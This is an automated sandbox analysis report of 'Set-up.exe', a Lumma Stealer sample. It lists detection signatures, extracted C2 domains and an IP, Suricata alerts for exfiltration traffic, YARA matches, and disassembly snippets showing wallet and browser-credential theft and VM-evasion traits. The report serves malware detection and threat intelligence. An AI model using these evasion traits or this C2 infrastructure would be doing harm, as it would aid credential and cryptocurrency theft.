Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1581651
MD5:	c906e379aaccba4950aabdb48e533541
SHA1:	6d5b74f01a4065737cfdd9cfeeaa7e3404af1a71
SHA256:	e8f37a06b0626b07d7999e81a6f95d4553d515e66dc578995b50d3404138aff5
Tags:	exelummastealeruser-zhuzhu0009
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 5356 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: C906E379AACCBA4950AABDB48E533541)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["prisonyfork.buzz", "inherineau.buzz", "screwamusresz.buzz", "scentniej.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "jammywritej.click"], "Build id": "qYuEFB--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4d6eb:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Set-up.exe PID: 5356	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 5356	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 5356	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 5356	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:19:11.389405+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.87.112	443	TCP
2024-12-28T12:19:13.533124+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.87.112	443	TCP
2024-12-28T12:19:16.018165+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.87.112	443	TCP
2024-12-28T12:19:18.491187+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.87.112	443	TCP
2024-12-28T12:19:20.948614+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.87.112	443	TCP
2024-12-28T12:19:23.612991+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	104.21.87.112	443	TCP
2024-12-28T12:19:26.215811+0100	2028371	3	Unknown Traffic	192.168.2.4	49748	104.21.87.112	443	TCP
2024-12-28T12:19:31.734778+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	104.21.87.112	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:19:12.260955+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	104.21.87.112	443	TCP
2024-12-28T12:19:14.382028+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.87.112	443	TCP
2024-12-28T12:19:32.519366+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49749	104.21.87.112	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:19:12.260955+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	104.21.87.112	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:19:14.382028+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49737	104.21.87.112	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:19:24.370093+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.87.112	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:19:26.226591+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49748	104.21.87.112	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.5356.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "inherineau.buzz", "screwamusresz.buzz", "scentniej.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "jammywritej.click"], "Build id": "qYuEFB--"}

Multi AV Scanner detection for submitted file

Source: Set-up.exe	ReversingLabs: Detection: 15%
Source: Set-up.exe	Virustotal: Detection: 16%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_09164E25 CryptUnprotectData,

0_2_09164E25

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	0_2_01EFB1F3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_01EF21DE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_01F0F17F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]	0_2_01EF814E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]	0_2_01EDE100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_01EEB0EE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_01EEB0EE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]	0_2_01EEB0EE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, word ptr [esi]	0_2_01EDC06E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h	0_2_01F0D05E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_01EFA037
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_01F10019
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_01F0FFF5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_01F1037E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_01F112CE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah	0_2_01F112CE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_01F10281
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]	0_2_01EDF249
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_01EFD5F9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]	0_2_01F0E5AE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [ebx+eax*2]	0_2_01EF6561
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	0_2_01EED54D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_01F1055D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_01EFD535
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [edi], 60296828h	0_2_01EF64C2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]	0_2_01EDE433
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then push eax	0_2_01F0F41C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h	0_2_01F107FE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add ecx, edi	0_2_01EFC7CD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]	0_2_01EE97DF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_01EF774E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_01EF774C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_01EFB73E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	0_2_01EE770A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	0_2_01F116BE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_01EE764A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_01EFD644
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_01EFD65B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_01EDA60E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_01F0661E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_01EF361E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea edx, dword ptr [eax-00001099h]	0_2_01F0C98E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_01EFA96F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_01F1090E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_01EF38FE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	0_2_01EF68FE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea ecx, dword ptr [eax+00000960h]	0_2_01EED8D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2]	0_2_01F0E897
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h	0_2_01F1187E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	0_2_01EDD849
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_01EFA80C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_01ED8BCE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_01ED8BCE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_01EEABC5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	0_2_01F11BBE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]	0_2_01EDBA64
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]	0_2_01EF9DE8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]	0_2_01EFEDA4
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add eax, 10h	0_2_01EEADBB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea ecx, dword ptr [eax-000037DBh]	0_2_01EDAD2E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then jmp edi	0_2_01EDBCF1
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea ecx, dword ptr [eax+000071B9h]	0_2_01EF7CDE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [esi+ecx], dl	0_2_01EDBCA5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_01F11C8E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp+04h], ebx	0_2_01EFCC4A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]	0_2_01F0CC0E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h	0_2_01F10C0E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_01EFCFFF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h	0_2_01EE7F2E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]	0_2_01EF6F2E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_01F10F3E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_01EECEE7
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]	0_2_01F09E7E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_01F11E0E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]	0_2_0915C942
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_0918D9C1
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, word ptr [esi]	0_2_0915A8B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_0918FB10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah	0_2_0918FB10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]	0_2_0915CC75
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_0918F150
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea edx, dword ptr [eax-00001099h]	0_2_0918B1D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h	0_2_0918F040
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	0_2_0915C08B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2]	0_2_0918D0D9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h	0_2_091900C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea ecx, dword ptr [eax+000071B9h]	0_2_09176520
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_091904D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_09169930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_09169930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]	0_2_09169930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]	0_2_09176990
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_0918E837
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0917B841
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_09178879
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h	0_2_0918B8A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_0918EBC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	0_2_09179A39
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_09170A20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]	0_2_0915DA8B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_0918EAC3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [edi], 60296828h	0_2_09174D04
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0917BD77
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_0918ED9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	0_2_0916BD8F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [ebx+eax*2]	0_2_09174DA8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]	0_2_0918CDF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then push eax	0_2_0918DC5E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	0_2_0918FF00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	0_2_09165F4C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_09175F90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_09179F80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_09175F8E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0917BE3B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_09158E50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_09171E60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_09184E60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0917BE9D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0917BE86
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_09165E8C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea ecx, dword ptr [eax+00000960h]	0_2_0916C112
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_09172140
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	0_2_09175140
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_091791B1
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add ecx, edi	0_2_0917B00F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]	0_2_09168021
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0917904E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]	0_2_0915A2A6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then jmp edi	0_2_0915A533
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then lea ecx, dword ptr [eax-000037DBh]	0_2_09159570
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add eax, 10h	0_2_091695FD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]	0_2_0917D5E6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_09157410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_09157410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_09169407
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	0_2_09190400
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]	0_2_0918B450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h	0_2_0918F450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp+04h], ebx	0_2_0917B48C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [esi+ecx], dl	0_2_0915A4E7
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_0916B729
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h	0_2_09166777
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]	0_2_09175770
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_0918F780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_0917C7DD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]	0_2_0917862A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_09190650
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]	0_2_091886C0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49746 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49748 -> 104.21.87.112:443

